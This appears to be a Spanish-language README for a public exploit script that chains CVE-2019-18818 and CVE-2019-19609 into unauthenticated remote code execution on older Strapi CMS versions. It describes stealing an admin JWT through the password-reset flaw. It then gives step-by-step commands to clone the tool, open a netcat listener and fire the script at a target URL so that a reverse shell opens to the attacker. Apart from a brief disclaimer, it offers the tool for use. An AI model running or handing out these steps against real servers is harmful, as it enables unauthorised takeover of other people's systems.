
Script de exploit que muestra una combinación de CVE-2019-18818 y CVE-2019-19609 para ejecución remota de código no autenticada en Strapi CMS.
Script de explotación que muestra una combinación de CVE-2019-18818 y CVE-2019-19609 para la ejecución remota de código no autenticada en Strapi CMS.
Este script explota una vulnerabilidad en Strapi CMS versiones 3.0.0-beta.17.4 y anteriores, permitiendo la ejecución remota de código no autenticada.
El exploit funciona aprovechando primero una vulnerabilidad en el restablecimiento de contraseña para obtener un JSON Web Token (JWT) de un usuario administrativo. Luego, este token se utiliza para enviar un payload malicioso al Strapi CMS, que desencadena una shell inversa hacia la máquina del atacante.
Clonar el repositorio:
git clone https://github.com/Hackhoven/Strapi-RCE.git
Navegar al directorio
cd Strapi-RCE/
Configurar un Listener de Netcat
nc -nlvp <LPORT>
Ejecutar el script con la URL objetivo, la dirección IP del host local y el puerto del host local como argumentos
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
Este script está destinado únicamente a fines educativos. El autor no aprueba ni apoya el uso de este script para actividades ilegales o no éticas. Este script solo debe usarse en entornos legales de investigación de seguridad o CTF. Úselo bajo su propio riesgo.
Hecho por Hackhoven